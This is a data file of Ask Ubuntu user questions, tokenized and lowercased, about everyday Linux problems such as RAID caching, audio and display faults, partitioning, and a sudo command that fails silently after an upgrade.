250205	can i cache an mdadm raid with an ssd ?	i have a 1tb array set up in raid 1 using mdadm on ubuntu 8 , to store mission-critical files . i 'd like to speed up read/write , especially for large files by caching to an ssd . is this possible ? does mdadm contain a facility to cache to another drive ? alternatively , is there something i should do to assign ordinary ram to caching ? there is 4gb ram and files to be written are rarely larger than 1gb so i 'm thinking writes should be quite quick just with ram caching alone . any help will be greatly appreciated .
250207	how to solve mkv video problem on 12.04	i have a problem with playing mkv file on my laptop . i installed driver and working well . mkv file is full hd ( 1080p ) and my pc is hd ( 720p ) . i opened it on totem . it is screenshot . i opened also on vlc . but result same : ( on windows 7 everything is good playing well . how to solve this problem ?
250209	ubuntu 12.04 freezes frequently and then returns to normal	my ubuntu 12.04 machine freezes in the middle of any activity and then returns to normal in 5-6s . although , this might not be a problem if it occurs sometimes , but in my case it occurs very frequently . for ex : the input from keyboard stopped appearing on the screen 4 times upto this point in the question . but , whatever i write is not lost , it appears on the screen when output is printed on screen . this happens while i am browsing through firefox and attempt to scroll down or change a tab , or when i am writing something on gedit , or while i am just browsing through my folders and open something new . the entire screen dims and the system hangs for a few seconds and then returns back to normal . first i thought it was due to memory constraint but it also happens when only 900mb of my 4gb ram is being used . can anybody help me with this ? edit : though the system hangs , the minimize , maximize and close button on top work appropriately and are fully usable . edit : no particular program was there at the top position in terms of cpu usage.usually there was xorg , firefox , gnome , debconf community and once there was apparmor parser ( apparmor parser was listed as using 100 % cpu and this happened when i was typing and the output stopped displaying )
250210	searching content inside of pictures and scans ?	i 'm pretty exciting by the `` scopes '' within ubuntu to search . however , i 've had trouble finding any concrete answers on the following . i love using evernote and google drive because they both search inside of pictures and scans for content . for instance , if i get a letter from the doctor that i want to keep , i will usually scan it and save it to evernote . if i need that letter 5 years from now , i can just search for terms that were in that scan , and viola , it is there . i would like to find a way of doing this on a local system so that i do n't have so much stuff in the cloud . is there a way of turning unity and scopes into a form of evernote ? are there programs out there that will search for text inside of images and store that information in metadata for a ubuntu scope search ?
250214	ubuntu 12.04.1 5.1 surround sound problem	i fail to set all speakers to work on the genius 5.1 . ( such connected work well on win 7 ) . i tried with alsamixer and pulseaudio but i do not succeed . aplay -l gives this : **** list of playback hardware devices **** card 0 : generic [ hd-audio generic ] , device 0 : vt1705 analog [ vt1705 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : generic [ hd-audio generic ] , device 1 : vt1705 digital [ vt1705 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : generic [ hd-audio generic ] , device 2 : vt1705 hp [ vt1705 hp ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic_1 [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 advance grateful for any suggestion .
250216	i installed an app from an untrusted source ? what to do now ?	as an ubuntu/linux newbie , i am not exactly accustomed with security . i tried to install gimpshop from this url : http : //www.ubuntugeek.com/images/gimpshop_2.2.11-1_i386.deb it was processed by ubuntu software center , but before the end , it disappeared from ubuntu software center and also from my download folder . i 'm afraid i allowed a virus or something dangerous onto my computer ... what can i do now ? is there a security software i could run to get rid of this ? how to know if the package was harmful or not ? thank you very much in advance .
250219	running windows from ubuntu	i have a windows vista problem i 'm trying to resolve with ubuntu , but i 'm not all that familiar with how to work one with the other . vista went into an update loop while my wife was booting up our acer aspire 5515 a few days ago . screen is stuck on installing part 3 of 3 at 0 % for over 5 hours . ca n't boot into safe mode with command line , system repair refuses to come up , so no system restore or command line or anything else . of course , the laptop came without any installation discs to boot from , and the recovery disks want to wipe the drive and reinstall windows . then i remember i have an older ubuntu cd i was playing around with years ago . i can boot from that , but because of the `` unclean '' state left by the failed update , i have to force mount the acer disk . so now i can see the drive . i renamed the pending.xml file in winsxs as recommended from ms support , but that has n't solved the problem . how do i run windows commands from ubuntu , e.g. , system restore so i can roll this puppy back to an earlier , happier time , or regedit so i can delete some of the keys also mentioned in the ms page ? thanks for any insight offered .
250223	unable to start avd in ubuntu 12.10 - permission denied	i am totally new to ubuntu . i installed adt ( eclipse ) from developer.android.com .. it is working fine . but when i try to start an avd it says : error:13 - permission denied . i tried to start eclipse with sudo ./eclipse but i am still getting the same error .
250224	ca n't login to account on guest or standard	thanks in advance for any help . ubuntu 12.04 up until recently my mother has been using the guest session when she logs on ; now , the guest session will not login . when i try to login to it , it bounces me back to the login screen . i then tried to login on a standard account ( alberta ) which i made prior to not being able to login to guest , and it turns out i can not login - it gives the `` invalid password '' error . so then i tried to change her password from my own account ( rory ) which is the master account . under the login options where the password option is , it says `` account disabled '' and it will not let me change this ; i try to apply a password , get no error , but it just still says `` account disabled '' . then i tried to delete the alberta account altogether , but got this error : http : //i.stack.imgur.com/uwhsd.jpg
250229	keyboard mapping does n't work as before	i modified the keyboard mapping using xkeycaps , then i press the button to restore it but it does n't work like before.. for example the cursor keys does n't work . when i press the up cursor key while xkeycaps open , xkeycaps highlights the print screen key . ubuntu 12.04
250233	headphones not working in ubuntu 12.10 . i have dell 5520 laptop . speakers are working fine .	when i plug in headphones , i hear only the music in the song and the lyrics is played in an inaudible low volume . and there is a lot of noise also .
250234	how can i fix gvim window size ?	this might not be a bug , but i 've installed the vim plugin package , spf13-vim . my gvim window looks like this screenshot , which seems too big : this might not be an issue with spf13-vim , since i 've used it on windows without problems . can anyone point me in the right direction so that i can see , say , 40 lines on the window at once ? my current font within vim is sans size 10 .
250240	how do i resize various dialogue boxes that ask for passwords , user inputs etc ?	here is a screen-shot of what i want to resize . on ubuntu 11.10 , this kind of dialogue were little short by length . that looked good . is there a way to do so by digging in the system files or by changing configs for compiz ?
250245	samba - network transfers from one share to another ... local or lan based ?	i have samba running on my server , which is ubuntu server 12.04 . i have ubuntu 12.04 desktop edition on my desktop . if i connect to a share on my server and i want to move files from one directory to another hosted by samba , am i inadvertently caching the files on my desktop before they 're moving to the other directory ? based on the speed i 'm getting it feels like i 'm transferring a file over the lan . in the efforts of speed , i suppose if i want to move files locally without any lan-oriented transfer interaction with my desktop , i 'd be better off ssh'ing in and simply mv'ing everything i want . eh ?
250249	how to use unallocated space in a triple-boot partition scheme ?	i am running with triple booting my system . i have a 1tb drive . i made the error of making the linux swap out of my 600gb ntfs drive , which then it made the space unallocated and i can not seem to add it to the extended partition . is there an easy way to fix this ? i do n't mind having to start over the installs , would like to keep the win7 partition so that i can still access the computer . setup : /dev/sda1 - ntfs - 100mb - boot /dev/sda2 - ntfs - win7 - 218.52gb /dev/sda3 - ntfs - win8 - 58.59gb /dev/sda4 - extended - lba - 61.25gb /dev/sda5 - ext4 - / - 53.71 /dev/sda6 - linux-swap - 8gb unallocated - 593.05gb did not know if i could just shift the linux swap to not be a primary so that i could allocate the 600gb . just want to use that drive as ntfs for disc images and media storage . my guess is that i will have to boot with gparted and delete my ubuntu install and repartition those drives , might even have to remove the windows 8 too ? not sure , can someone give me a partition layout that will work for my triple boot with a media partition as well with all the swaps needed ? thanks .
250251	dim/dark screen back after latest update [ ubuntu 12.04 ]	i booted a few minutes ago and everything was fine , update manager notified me about new updates so i decided to install them , and then poof , dim/dark screen is back in action . i did update grub , i did tried to remve fglrx but terminal said i do n't even have it installed and the `` classical '' fix i used is the sudo setpci -s 00:02.0 f4.b=01 it does work , but only till i reboot , i had same problem but i added this code before exit 0 from /etc/rc.local [ gksudo gedit /etc/rc.local ] now it 's still here but it does n't work . i also tried nomode set before booting , it resulted in a crash . any ideas how to fix it ? and i would also want to know if i can get completely the rid of this thing ? it always came back when the computer was idle or when i tried to run things in full screen mode . other info : i run it on an acer aspire 5732z with intel gma 4500m ( graphics accelerator ) if this helps .
250257	i want to remove windows 7 completely and just use ubuntu . how do i do this ?	i want to get rid of a hacked version of windows 7 on my laptop and just have ubuntu . is this possible and how do i go about doing it ?
250258	dns a records ubuntu server	this may sounds very easy to do but i 'm a little confused in the process . i 've registered a domain e.g . example.com and want to point it to my server with ip e.g . 111.111.111.111 i 've made ns1.example.com and ns2.example.com at my domain control panel but how do i add the -a records at the server end ( ubuntu ) . do i need to install bind or it can be done without it ?
250261	which port does ubuntu software center use ?	i have installed the gufw firewall utility and want to make a whitelist of ports ( want maximum security , but whitelisting single ips is currently too tedious ) . i have so far only entered ports 53 ( for dns ) , 80 ( for http ) and 443 ( for https ) , both in- and outgoing , into the whitelist and closed the firewall , but ubuntu software center can install programs without hindrance , whereas the firewall definitely is running ( www content wo n't load when list entries are not present ) . is it using any of these ports for program data transfer ? seems strange to me . or is there an overriding exception pre-defined in ubuntu ( this is a new setup , 12.04 ) ? what is probably the case here , and what port does the software center use for program data ( i assume it does use http for the interface and list entries , but the programs themselves ? ) ? tldr : why does ubuntu software center get through my firewall which blocks all but dns/http/https ( via blocking all other ports ) , so that it can install programs ? which port does it use for the program data transfer ?
250271	how to have quicklist item launch in a path ?	in a .desktop file you can specify the path key in a [ desktop entry ] so that the working directory will be that path when the exec is launched . however , this key does not seem to work when launching items from quicklist even though the path key is set in the [ desktop action ] group . am i doing something wrong or does unity not support this yet ? if there 's no way to do this , can i change the exec key in some way to get the same effect ? edit : for testing purposes , here 's an example little script ( displaycwd.py ) that when run displays the current working path in a gtk window . there 's an example .desktop file that follows showing that when run normally through the launcher it opens with the right path ( /home/ian/documents in my case ) . however , activating it through a quicklist , displays the user directory ( /home/ian in my case ) instead . just make sure to put the script somewhere in your $ path . # ! /usr/bin/python from gi.repository import gtk import os pwd=os.path.realpath ( os.curdir ) win=gtk.window ( ) label=gtk.label ( pwd ) win.add ( label ) win.show_all ( ) win.connect ( 'destroy ' , gtk.main_quit ) gtk.main ( ) and the .desktop file : [ desktop entry ] name=display working directory exec=displaycwd.py type=application actions=quicklist path=/home/ian/documents icon=folder [ desktop action quicklist ] name=ql display wd exec=displaycwd.py path=/home/ian/documents
250272	nvidia gt620m on ubuntu 12.04	buyed a new pc with a nvidia gt620m . someone can help me to install the right drivers ? thank you . it does n't shown in the additional driver hardware
250273	no visual interface on ubuntu 12.10 after installing updates	i installed ubuntu 12.10 on my computer and somewhere between running the updates and installing unsettings , cairo , and ubuntu tweak ; the system asks to restart . after that there is no visual interface , just terminal . it asks me for my login information but without visual interface . i have reinstalled a couple of times because i was getting a error after running the updates . last time i got past the error by updating with terminal . it asked me to restart after running cairo and then i have no visual interface again .
250274	how to uninstall ubuntu 12.10 and install 12.04 ?	i have a macbook pro and i have successfully installed windows 7 via bootcamp and then installed ubuntu 12.10 along side windows 7 . it works fine ... but for my school project i need to use ubuntu 12.04 - i know i should have known this from the start , would have made things easier : -/ now my question is how to uninstall 12.10 and then reinstall 12.04 ? i think it wouldnt be a problem to install 12.04 but the question is more how to uninstall 12.10 ? thank you .
250276	desktop icons out of place when on multiple monitors ?	i have two monitors set up , one is my laptop monitor and the other is an external display . the external display is on the right side of my laptop and levitated with a stand , so i set the display positions in the 'displays ' settings to reflect their physical position . the following is a screen shot of my workspace switcher , the bottom left one is my laptop display and the top right is my external display . so there are two main problems : the desktop background reflects the display position that i set up in 'displays ' settings , and you can notice that all my desktop icons are in the top right corner which i have no access to , it 's not in my display ! if i move the laptop display to the top then they show up . the workspace display is not correct on the big screen , it 's missing the left part . does any ubuntu expert know how to fix this ? p.s . the system is 12.04 64bit .
250277	please help me install	i have an asus ux32a it pre loaded with windows 8 . i seems to be an uefi . i have always used ubuntu on my old pc but now i have a laptop . i am scared to lose windows 8 totally . my 500 gb drive is factory partitioned . how do i re-partition . what is the best method of installing it ? i am very confused about this . my old pc was ubuntu only which i managed . do i need to make system image of windows or is it not necessary ? is there any one i can talk to to me ... i am desparate . also is lubuntu a better option for a basic user ?
250279	how do i install cinelerra 4.4 ?	where i can found a ready-made cinelerra 4.4 .deb package to install ? im not an expert to compile everything and resolving all dependencies on my own .
250282	unable to install the ubuntu toolkit	i wanted to install the ubuntu tool kit to get started programming , but when the install was nearly on its end it threw up the following error : the following packages have unmet dependencies : qt-components-ubuntu : depends : libqt5core5 ( > = 5.0.0 ) but it is not installable depends : libqt5gui5 ( > = 5.0.0 ) but it is not installable depends : libqt5qml5 but it is not installable depends : libqt5quick5 but it is not installable e : unable to correct problems , you have held broken packages . i donât know what the problem is and what i am able to do about it ! help is appreciated .
250285	feh alternative that reproduce .gif	i love feh to classify my image collections , i 've set the actions to move the current image to a certain directory , the problem comes when trying to open gifs , feh does n't animate them . therefore i was searching a lightweight image/gif viewer with the possibility to execute commands with simple key strokes as -- action of feh does . thank you i 've found a program that might be good enough it 's called gifview and it 's an old version f gifsicle you can get it by installing gifsicle . the really interesting option is -w where you specify the window to open the gifs ( so you can make all go to the same acting pretty much like feh ) , it still does n't accept command inputs but it 's close enough .
250286	how to change read-only pendrive ?	i have a generic pendrive with a problem ... i ca n't copy to inside , delete or move any archive or folder from the pendrive . i do n't know how this happens , i do not change any kind of permissions ... the only change that i made was change the user password feels days ago . i try use dosfsck -t -a /dev/sdb1 but without results ... some minutes before the terminal shows : contains a free cluster ( 199578 ) . assuming eof . broke cycle at cluster 119648 in free chain . unable to create unique name . i ca n't even format that ... it is useless ... anyone can help ? the syslog shows : feb 1 15:32:13 everton-vostro1510 kernel : [ 2714.745488 ] usb 2-4 : usb disconnect , device number 4 feb 1 15:32:13 everton-vostro1510 udisksd [ 1979 ] : cleaning up mount point /media/everton/everton ( device 8:17 no longer exist ) feb 1 15:32:18 everton-vostro1510 kernel : [ 2720.024168 ] usb 2-4 : new high-speed usb device number 5 using ehci_hcd feb 1 15:32:18 everton-vostro1510 kernel : [ 2720.163813 ] usb 2-4 : new usb device found , idvendor=058f , idproduct=6387 feb 1 15:32:18 everton-vostro1510 kernel : [ 2720.163824 ] usb 2-4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 feb 1 15:32:18 everton-vostro1510 kernel : [ 2720.163832 ] usb 2-4 : product : mass storage feb 1 15:32:18 everton-vostro1510 kernel : [ 2720.163839 ] usb 2-4 : manufacturer : generic feb 1 15:32:18 everton-vostro1510 kernel : [ 2720.163846 ] usb 2-4 : serialnumber : 4b367433 feb 1 15:32:18 everton-vostro1510 kernel : [ 2720.166566 ] scsi6 : usb-storage 2-4:1.0 feb 1 15:32:18 everton-vostro1510 mtp-probe : checking bus 2 , device 5 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-4 '' feb 1 15:32:18 everton-vostro1510 mtp-probe : bus : 2 , device : 5 was not an mtp device feb 1 15:32:19 everton-vostro1510 kernel : [ 2721.167548 ] scsi 6:0:0:0 : direct-access generic flash disk 8.07 pq : 0 ansi : 4 feb 1 15:32:19 everton-vostro1510 kernel : [ 2721.170022 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 feb 1 15:32:19 everton-vostro1510 kernel : [ 2721.176841 ] sd 6:0:0:0 : [ sdb ] 16000128 512-byte logical blocks : ( 8.19 gb/7.62 gib ) feb 1 15:32:19 everton-vostro1510 kernel : [ 2721.177843 ] sd 6:0:0:0 : [ sdb ] write protect is on feb 1 15:32:19 everton-vostro1510 kernel : [ 2721.177855 ] sd 6:0:0:0 : [ sdb ] mode sense : 23 00 80 00 feb 1 15:32:19 everton-vostro1510 kernel : [ 2721.178963 ] sd 6:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua feb 1 15:32:19 everton-vostro1510 kernel : [ 2721.193531 ] sdb : sdb1 feb 1 15:32:19 everton-vostro1510 kernel : [ 2721.197623 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk feb 1 15:32:20 everton-vostro1510 udisksd [ 1979 ] : mounted /dev/sdb1 at /media/everton/everton on behalf of uid 1000 using the command : cat /proc/mounts | grep sdb everton @ everton-vostro1510 : ~ $ cat /proc/mounts | grep sdb /dev/sdb1 /media/everton/everton vfat ro , nosuid , nodev , relatime , uid=1000 , gid=1000 , fmask=0022 , dmask=0077 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , showexec , utf8 , flush , errors=remount-ro 0 0
250287	recursive list of files with names that do n't contain a certain string	i have : a directory with many nested subdirectories and files . i would like : a list of all files whose name does n't contain a certain string . example file structure : foo/ foo/bar/foobar.txt foo/foo/foobartest.txt foo/foobartest.txt if i enter my query with the string `` test '' it should return only /foo/bar/foobar.txt i suppose one would use find with some regex ? thanks a lot for your help !
250288	raid ( mdadm ) - flags necessary ?	as i understand it , it 's best practice to set the drive flags as `` raid '' before adding them to a mdadm raid array . okay fine , but i also heard people say that they did n't do this and mdadm worked fine . does mdadm auto-add the raid flag once you add the drives to the array and begin building ? is there any benefit to using the raid flag since it appears mdadm seems to work with or without it ?
250290	how do i scan for viruses with clamav ?	i installed clamav via terminal ( ctrl+alt+t ) with : sudo apt-get install clamav but how can i scan for viruses ?
250293	manually installing ubuntu 12.10 with lvm	i have a 8 gb flash drive . i need it to install ubuntu with encrypted lvm . when i use automatic partitioning everything is be okay and works . but the machine sets 2 gigabytes swap , an unreasonably high value . i could use manual partitioning with standard sections of course , but god i can not figure out how to set up lvm . is there a section vlm with encryption , but failed to implement it into my / swap as it does automaton . could someone please advise ?
250296	change decimal mark in calculator	in germany we use , as decimal mark instead of .. since i installed my ubuntu in english , the ubuntu default calculator ( gcalctool ) uses the . and i ca n't use the , on my german numpad . i already set up german in system settings ... = > language support= > regional formats but it does n't seem to set it for the calculator . i also saw this question but i want to avoid remapping my keys . can someone tell me if and how i can change this for the calculator or recommend a calculator that supports it ?
250301	i broke sudo after an upgrade from 9 to 12.04.1	currently sudo will prompt for a password , but absolutely nothing happens after that . no errors of any kind . i 've checked the sudoers file , it passed the visudo syntax check , here 's the setup : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d the file has 0440 as permission . i 've added myself to the sudo and admin group . here 's what it looks like when i attempt to use sudo : kml @ rhythmsdev : /etc $ sudo apt-get update kml @ rhythmsdev : /etc $ as you can see , no error at all . it simply returns to the prompt . here 's the file permissions -r -- r -- -- - 1 root root 723 feb 1 10:10 sudoers sudoers.d drwxr-xr-x 2 root root 4096 feb 4 16:46 . here is the output of id one of the users that i 'm trying to get sudo to work under : uid=1010 ( kml ) gid=102 ( develop ) groups=102 ( develop ) ,4 ( adm ) ,27 ( sudo ) ,106 ( admin ) ,110 ( ftp ) how i performed the upgrade . i performed the upgrade using do-release-upgrade -d over ssh , but with physical access possible via a trip down the hallway . here are the contents of the /etc/sources.list # # deb cdrom : [ ubuntu-server 10.04 lts _lucid lynx_ - release i386 ( 20100427 ) ] / lucid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //us.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # deb http : //security.ubuntu.com/ubuntu maverick-security main universe directory : /etc/apt/sources.list.d is empty . lsb_release -a is no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise apt-cache policy sudo is : sudo : installed : 1.8.3p1-1ubuntu3.3 candidate : 1.8.3p1-1ubuntu3.3 version table : *** 1.8.3p1-1ubuntu3.3 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main i386 packages 100 /var/lib/dpkg/status 1.8.3p1-1ubuntu3.2 0 500 http : //security.ubuntu.com/ubuntu/ precise-security/main i386 packages 1.8.3p1-1ubuntu3 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main i386 packages type -a sudo is sudo is /usr/bin/sudo sha256sum $ ( which sudo ) is 0efd358e04ea07dc73b67642d9bb85f49143c65996a7c88a57b42557a0b0a50d /usr/bin/sudo pkexec echo success did this : ==== authenticating for org.freedesktop.policykit.exec === authentication is needed to run `/bin/echo ' as the super user multiple identities can be used for authentication : 1 . my name , , , ( me ) 2. , account used for git , , ( git ) 3 . coworker1 , , , ( cw1 ) 4 . coworker2 , , , ( cw2 ) 5 . coworker3 , , , ( cw3 ) 6 . my name , , , ( me ) 7 . coworker4 , , , ( cw4 ) 8 . coworker5 , , , ( cw5 ) 9. , account used for git , , ( git ) choose identity to authenticate as ( 1-9 ) : 1 password : ==== authentication complete === success names have been changed to protect the mostly innocent . i show up twice , for some reason . but none of the other coworkers can use sudo either ( the ones that could pre-upgrade anyways ) . here 's the output of a few more commands . visudo the sudoers file and added kml all= ( all : all ) all under the root line sudo -i echo success returned the same as before , nothing . echo foo | sudo tee foo.txt ; ls -l foo.txt yielded : ls : can not access foo.txt : no such file or directory how i reinstalled sudo . i accomplished this twice . the first time i ran apt-get install -- reinstall sudo -- from root that accomplished little , so i uninstalled first via : apt-get uninstall sudo followed by apt-get install sudo edit more info , reditied sudo returns silent after password authentication and does n't ask again . sudo -k and sudo -k also fails silently i was logged in as root , it prompts for a password on a normal account . more info 2 i ran tail -f /var/log/auth.log here 's the output from my sudo ls from my kml account feb 6 16:33:27 rhythmsdev sudo : pam_unix ( sudo : session ) : session opened for user root by kml ( uid=1010 ) feb 6 16:33:27 rhythmsdev sudo : pam_unix ( sudo : session ) : session closed for user root attempting an incorrect password prompts for a new password , and logs this feb 6 16:35:17 rhythmsdev sudo : pam_unix ( sudo : auth ) : authentication failure ; logname=kml uid=1010 euid=0 tty=/dev/pts/0 ruser=kml rhost= user=kml ed3 sudo apt-get clean & & sudo apt-get update & & sudo apt-get -- purge -- reinstall install sudo sudo still does n't work . here was the output apt-get install -- purge -- reinstall sudo reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : mono-2.0-gac libxcb-aux0 python-fstab libgnomekbd4 libts-0.0-0 libwpd8c2a libcdio10 xsltproc pnm2ppa librpmbuild0 libcolamd2.7.1 lp-solve libglitz-glx1 openoffice.org-writer libntfs10 python-gnome2 libxcb-render-util0 libevent-1.4-2 gnome-media gnome-desktop-data libgtk-vnc-1.0-0 libgnomepanel2.24-cil xulrunner-1.9.2 libxcb-event1 libindicator0 linux-headers-2.6.32-38 libicu42 openoffice.org-draw libdbusmenu-glib1 ubufox python-aptdaemon-gtk openoffice.org-gtk libsilc-1.1-2 libgnome-media0 libbeagle1 g++-4.4 libexchange-storage1.2-3 libgraphite3 libwpg-0.1-1 libibus1 libproxy0 libnm-util1 python-gtksourceview2 libevview2 scrollkeeper libindicate-gtk2 libwebkit-1.0-2 libmono-system-runtime2.0-cil libpisock9 libdns64 libcamel1.2-14 bcmwl-modaliases librpmio0 librpm0 libgnome2-perl libaccess-bridge-java-jni libstdc++6-4.4-dev libeggdbus-1-0 libnspr4-0d libgtkhtml-editor0 esound-common python-pyorbit gdebi-core libnotify1 python-telepathy libedata-cal1.2-6 libaccess-bridge-java libdevkit-power-gobject1 gnome-media-common librasqal2 libpango1.0-common ubuntuone-client-gnome cups-driver-gutenprint libgadu3 openoffice.org-style-human libmono-cairo2.0-cil libisccc60 cpu-checker libgweather1 python-gtkspell libgnome-bluetooth7 libxxf86misc1 libloudmouth1-0 libsexy2 libxcb-atom1 libido-0.1-0 libgmime2.4-cil compiz-plugins libffi5 libgnome-pilot2 libdirectfb-1.2-0 openoffice.org-style-galaxy libgssdp-1.0-2 libcryptui0 finger libmusicbrainz4c2a python-pyatspi libgp11-0 libjs-mootools python-webkit libgcr0 libqt4-webkit libcdio-cdda0 libhunspell-1.2-0 liblwres60 libgmp3c2 libgtksourceview2.0-common openoffice.org-math libhal1 libgtksourceview2.0-0 hal libgnome2-vfs-perl libprotobuf5 libesd0 openoffice.org-common libegroupwise1.2-13 libdbusmenu-gtk1 libgsf-1-common gnome-doc-utils libecal1.2-7 at-spi libpoppler5 libgmime-2.4-2 libgdata1.2-1 libedataserver1.2-11 libhal-storage1 libpython2.6 gnome-system-monitor libmldbm-perl libbind9-60 libimobiledevice0 libgtkmm-2.4-1c2a libglitz1 libevdocument2 libgdata-google1.2-1 libspeechd2 fglrx-modaliases libnunit2.4-cil libclutter-gtk-0.10-0 libebook1.2-9 libmagickcore2 libaudiofile0 libwps-0.1-1 libedataserverui1.2-8 nvidia-173-modaliases libphonon4 libgnome-window-settings1 libedata-book1.2-2 libgdata6 libxss1 libgs8 openoffice.org-emailmerge libappindicator0 liblpint-bonobo0 ntfsprogs libjpeg62 libgtkhtml-editor-common libqt4-designer libmpfr1ldbl libcdio-paranoia0 libmysqlclient16 libmagickwand2 libisccfg60 libfreezethaw-perl smartdimmer libgupnp-1.0-3 screen-resolution-extra libnl1 libanthy0 tsconf liboobs-1-4 libgucharmap7 libgksu2-0 libdb4.7 libsilcclient-1.1-3 libindicate4 libndesk-dbus-glib1.0-cil libraptor1 python-wnck liboil0.3 libebackend1.2-0 firefox-branding hal-info speech-dispatcher libgnome-desktop-2-17 fuse-utils python-desktopcouch gwibber libisc60 libnice0 linux-headers-2.6.32-38-generic libnautilus-extension1 compiz-fusion-plugins-main gnome-applets-data min12xxw libwebkit-1.0-common libavahi-ui0 libprotoc5 nvidia-96-modaliases libavahi-core6 libgupnp-igd-1.0-2 libgnome2-canvas-perl libgtkhtml3.14-19 libgsf-1-114 python-rdflib gnome-panel-data libpoppler-glib4 libpisync1 libdotconf1.0 python-indicate use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 16 not upgraded . need to get 292 kb of archives . after this operation , 0 b of additional disk space will be used . get:1 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main sudo i386 1.8.3p1-1ubuntu3.3 [ 292 kb ] fetched 292 kb in 0s ( 742 kb/s ) ( reading database ... 310429 files and directories currently installed . ) preparing to replace sudo 1.8.3p1-1ubuntu3.3 ( using ... /sudo_1.8.3p1-1ubuntu3.3_i386.deb ) ... unpacking replacement sudo ... processing triggers for ureadahead ... processing triggers for man-db ... setting up sudo ( 1.8.3p1-1ubuntu3.3 ) ... edit 4 sha256sum /usr/lib/sudo/sudoers.so /usr/lib/sudo/sudo_noexec.so results in 6f2e56e05d9a3de942558255b72d59a147be2c637247e244c365838378fe6ec3 /usr/lib/sudo/sudoers.so 7db6a45129ec1ef6d4cb21d7a488a85f5b45e4d21990116f64c9e71f116648c0 /usr/lib/sudo/sudo_noexec.so sudo as another user , ( ran as root ) root @ rhythmsdev : /home/kml # sudo -u kml echo success root @ rhythmsdev : /home/kml # edit 5 using the scripts provided by eliah kagan here i checked for duplicate groups & id 's . all the diffs come up blank . edit 6 strace echo success here edit 7 root @ rhythmsdev : /home/kml # sudo echo success root @ rhythmsdev : /home/kml # echo $ ? 1 edit 8 this seems interesting , this is different than a server that has working sudo root @ rhythmsdev : /home/kml # sudo -l matching defaults entries for root on this host : env_reset , secure_path=/usr/local/sbin\ : /usr/local/bin\ : /usr/sbin\ : /usr/bin\ : /sbin\ : /bin user root may run the following commands on this host : ( all : all ) all ( all ) all root @ rhythmsdev : /home/kml # that 's me as root me as me ( not root ) kml @ rhythmsdev : ~ $ sudo -l [ sudo ] password for kml : matching defaults entries for kml on this host : env_reset , secure_path=/usr/local/sbin\ : /usr/local/bin\ : /usr/sbin\ : /usr/bin\ : /sbin\ : /bin user kml may run the following commands on this host : ( all : all ) all ( all ) all ( all : all ) all kml @ rhythmsdev : ~ $ thank you , i 'm fresh out of ideas at the moment .
